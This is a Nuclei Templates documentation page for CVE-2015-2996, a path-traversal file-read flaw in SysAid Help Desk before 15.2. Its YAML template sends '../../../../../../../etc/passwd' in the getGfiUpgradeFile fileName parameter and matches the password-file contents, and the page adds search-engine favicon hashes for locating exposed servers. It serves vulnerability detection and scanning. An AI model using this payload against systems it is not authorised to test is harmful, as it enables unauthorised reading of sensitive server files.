Skip to content
Nuclei Templates

SysAid Help Desk <15.2 - Local File Inclusion

ID: CVE-2015-2996

Severity: high

Author: 0x_Akoko

Tags: cve2015,cve,sysaid,lfi,seclists

Description

Section titled “Description”

SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.

YAML Source

Section titled “YAML Source”
id: CVE-2015-2996


info:
  name: SysAid Help Desk <15.2 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: |
    SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server.
  remediation: |
    Upgrade SysAid Help Desk to version 15.2 or later to mitigate the vulnerability.
  reference:
    - https://seclists.org/fulldisclosure/2015/Jun/8
    - https://www.sysaid.com/blog/entry/sysaid-15-2-your-voice-your-service-desk
    - http://seclists.org/fulldisclosure/2015/Jun/8
    - https://nvd.nist.gov/vuln/detail/CVE-2015-2996
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:C
    cvss-score: 8.5
    cve-id: CVE-2015-2996
    cwe-id: CWE-22
    epss-score: 0.77754
    epss-percentile: 0.98153
    cpe: cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: sysaid
    product: sysaid
    shodan-query: http.favicon.hash:1540720428
    fofa-query: icon_hash=1540720428
  tags: cve2015,cve,sysaid,lfi,seclists


http:
  - method: GET
    path:
      - "{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"
      - "{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"


    stop-at-first-match: true


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"


      - type: status
        status:
          - 200
# digest: 490a0046304402203c8baa37470770b8539f1ce1267020f82a2a6e406f6783b7a00d683082daea72022054f2a8d93598440685c7c54f2d8bf8c281f95786dabde63f1db95e7532fc49d3:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2015/CVE-2015-2996.yaml"

View on Github